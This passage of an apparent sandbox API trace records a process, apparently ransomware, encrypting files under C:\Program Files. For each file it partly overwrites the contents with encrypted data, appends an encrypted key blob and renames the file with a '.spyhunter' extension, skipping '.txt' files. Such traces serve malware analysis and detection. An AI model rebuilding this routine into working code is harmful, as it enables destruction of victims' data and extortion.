hFile=0x154, liDistanceToMove=0xffffedfe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.387] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1202, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa1c*=0x1202, lpOverlapped=0x0) returned 1 [0112.387] GetProcessHeap () returned 0x2c0000 [0112.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.388] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.388] WriteFile (in: hFile=0x154, lpBuffer=0x57fa5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x57fa5c*, lpNumberOfBytesWritten=0x57fa1c*=0x4, lpOverlapped=0x0) returned 1 [0112.388] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa1c*=0x30, lpOverlapped=0x0) returned 1 [0112.388] CloseHandle (hObject=0x154) returned 1 [0112.389] GetProcessHeap () returned 0x2c0000 [0112.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.389] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.GIF.spyhunter") returned 76 [0112.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.gif.spyhunter")) returned 1 [0112.390] GetProcessHeap () returned 0x2c0000 [0112.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.390] GetProcessHeap () returned 0x2c0000 [0112.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.390] GetProcessHeap () returned 0x2c0000 [0112.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01d20 | out: hHeap=0x2c0000) returned 1 [0112.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa58 | out: pbBuffer=0x57fa58) returned 1 [0112.390] GetProcessHeap () returned 0x2c0000 [0112.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa50*=0x30) returned 1 [0112.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0112.391] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG") returned 66 [0112.391] StrStrW (lpFirst="NOTEBOOK.JPG", lpSrch=".txt") returned 0x0 [0112.391] GetProcessHeap () returned 0x2c0000 [0112.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.392] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa14*=0xb86, lpOverlapped=0x0) returned 1 [0112.459] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff47a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.460] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb86, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa14*=0xb86, lpOverlapped=0x0) returned 1 [0112.460] GetProcessHeap () returned 0x2c0000 [0112.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.460] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.460] WriteFile (in: hFile=0x154, lpBuffer=0x57fa54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x57fa54*, lpNumberOfBytesWritten=0x57fa14*=0x4, lpOverlapped=0x0) returned 1 [0112.460] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa14*=0x30, lpOverlapped=0x0) returned 1 [0112.460] CloseHandle (hObject=0x154) returned 1 [0112.460] GetProcessHeap () returned 0x2c0000 [0112.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0112.461] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG.spyhunter") returned 76 [0112.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\NOTEBOOK.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\notebook.jpg.spyhunter")) returned 1 [0112.651] GetProcessHeap () returned 0x2c0000 [0112.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0112.651] GetProcessHeap () returned 0x2c0000 [0112.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.651] GetProcessHeap () returned 0x2c0000 [0112.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01c50 | out: hHeap=0x2c0000) returned 1 [0112.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa58 | out: pbBuffer=0x57fa58) returned 1 [0112.651] GetProcessHeap () returned 0x2c0000 [0112.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa50*=0x30) returned 1 [0112.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.666] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt") returned 74 [0112.666] StrStrW (lpFirst="Contacts.accdt", lpSrch=".txt") returned 0x0 [0112.666] GetProcessHeap () returned 0x2c0000 [0112.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.667] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa14*=0x2800, lpOverlapped=0x0) returned 1 [0112.724] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.724] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa14*=0x2800, lpOverlapped=0x0) returned 1 [0112.725] GetProcessHeap () returned 0x2c0000 [0112.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.725] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.725] WriteFile (in: hFile=0x16c, lpBuffer=0x57fa54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x57fa54*, lpNumberOfBytesWritten=0x57fa14*=0x4, lpOverlapped=0x0) returned 1 [0112.754] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa14*=0x30, lpOverlapped=0x0) returned 1 [0112.754] CloseHandle (hObject=0x16c) returned 1 [0112.815] GetProcessHeap () returned 0x2c0000 [0112.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e0c840 [0112.816] wnsprintfW (in: pszDest=0x2e0c840, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt.spyhunter") returned 84 [0112.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Contacts.accdt.spyhunter" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\contacts.accdt.spyhunter")) returned 1 [0112.816] GetProcessHeap () returned 0x2c0000 [0112.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c840 | out: hHeap=0x2c0000) returned 1 [0112.816] GetProcessHeap () returned 0x2c0000 [0112.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.817] GetProcessHeap () returned 0x2c0000 [0112.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de0568 | out: hHeap=0x2c0000) returned 1 [0112.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa50 | out: pbBuffer=0x57fa50) returned 1 [0112.817] GetProcessHeap () returned 0x2c0000 [0112.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa48*=0x30) returned 1 [0112.817] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0112.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll") returned 75 [0112.831] StrStrW (lpFirst="FeedSync.dll", lpSrch=".txt") returned 0x0 [0112.831] GetProcessHeap () returned 0x2c0000 [0112.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.831] ReadFile (in: hFile=0xcc, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa0c*=0x2800, lpOverlapped=0x0) returned 1 [0112.849] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.849] WriteFile (in: hFile=0xcc, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa0c*=0x2800, lpOverlapped=0x0) returned 1 [0112.849] GetProcessHeap () returned 0x2c0000 [0112.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.849] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.849] WriteFile (in: hFile=0xcc, lpBuffer=0x57fa4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x57fa4c*, lpNumberOfBytesWritten=0x57fa0c*=0x4, lpOverlapped=0x0) returned 1 [0112.979] WriteFile (in: hFile=0xcc, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa0c*=0x30, lpOverlapped=0x0) returned 1 [0112.980] CloseHandle (hObject=0xcc) returned 1 [0112.980] GetProcessHeap () returned 0x2c0000 [0112.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0112.980] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.spyhunter") returned 85 [0112.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.spyhunter" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll.spyhunter")) returned 1 [0112.981] GetProcessHeap () returned 0x2c0000 [0112.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0112.981] GetProcessHeap () returned 0x2c0000 [0112.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.981] GetProcessHeap () returned 0x2c0000 [0112.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc0d20 | out: hHeap=0x2c0000) returned 1 [0112.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa50 | out: pbBuffer=0x57fa50) returned 1 [0112.981] GetProcessHeap () returned 0x2c0000 [0112.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa48*=0x30) returned 1 [0112.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0113.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned 88 [0113.110] StrStrW (lpFirst="Workflow.Targets", lpSrch=".txt") returned 0x0 [0113.110] GetProcessHeap () returned 0x2c0000 [0113.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0113.111] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa0c*=0x1276, lpOverlapped=0x0) returned 1 [0113.112] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.112] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1276, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa0c*=0x1276, lpOverlapped=0x0) returned 1 [0113.112] GetProcessHeap () returned 0x2c0000 [0113.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0113.112] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.112] WriteFile (in: hFile=0x158, lpBuffer=0x57fa4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x57fa4c*, lpNumberOfBytesWritten=0x57fa0c*=0x4, lpOverlapped=0x0) returned 1 [0113.112] WriteFile (in: hFile=0x158, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa0c*=0x30, lpOverlapped=0x0) returned 1 [0113.113] CloseHandle (hObject=0x158) returned 1 [0113.113] GetProcessHeap () returned 0x2c0000 [0113.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.113] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.spyhunter") returned 98 [0113.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.spyhunter" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.spyhunter")) returned 1 [0113.113] GetProcessHeap () returned 0x2c0000 [0113.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.113] GetProcessHeap () returned 0x2c0000 [0113.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.113] GetProcessHeap () returned 0x2c0000 [0113.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35cf60 | out: hHeap=0x2c0000) returned 1 [0113.114] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa48 | out: pbBuffer=0x57fa48) returned 1 [0113.114] GetProcessHeap () returned 0x2c0000 [0113.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa40*=0x30) returned 1 [0113.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.114] GetProcessHeap () returned 0x2c0000 [0113.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.114] GetProcessHeap () returned 0x2c0000 [0113.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c408 | out: hHeap=0x2c0000) returned 1 [0113.115] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa48 | out: pbBuffer=0x57fa48) returned 1 [0113.115] GetProcessHeap () returned 0x2c0000 [0113.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.115] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa40*=0x30) returned 1 [0113.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.115] GetProcessHeap () returned 0x2c0000 [0113.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.115] GetProcessHeap () returned 0x2c0000 [0113.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2e910 | out: hHeap=0x2c0000) returned 1 [0113.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa40 | out: pbBuffer=0x57fa40) returned 1 [0113.116] GetProcessHeap () returned 0x2c0000 [0113.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.116] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa38*=0x30) returned 1 [0113.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.116] GetProcessHeap () returned 0x2c0000 [0113.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.116] GetProcessHeap () returned 0x2c0000 [0113.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d460 | out: hHeap=0x2c0000) returned 1 [0113.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa40 | out: pbBuffer=0x57fa40) returned 1 [0113.116] GetProcessHeap () returned 0x2c0000 [0113.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.116] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa38*=0x30) returned 1 [0113.117] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.117] GetProcessHeap () returned 0x2c0000 [0113.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.117] GetProcessHeap () returned 0x2c0000 [0113.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d360 | out: hHeap=0x2c0000) returned 1 [0113.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa38 | out: pbBuffer=0x57fa38) returned 1 [0113.118] GetProcessHeap () returned 0x2c0000 [0113.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa30*=0x30) returned 1 [0113.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.118] GetProcessHeap () returned 0x2c0000 [0113.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.118] GetProcessHeap () returned 0x2c0000 [0113.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9f60 | out: hHeap=0x2c0000) returned 1 [0113.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa38 | out: pbBuffer=0x57fa38) returned 1 [0113.118] GetProcessHeap () returned 0x2c0000 [0113.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa30*=0x30) returned 1 [0113.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.119] GetProcessHeap () returned 0x2c0000 [0113.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.119] GetProcessHeap () returned 0x2c0000 [0113.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d260 | out: hHeap=0x2c0000) returned 1 [0113.119] CryptGenRandom (in: 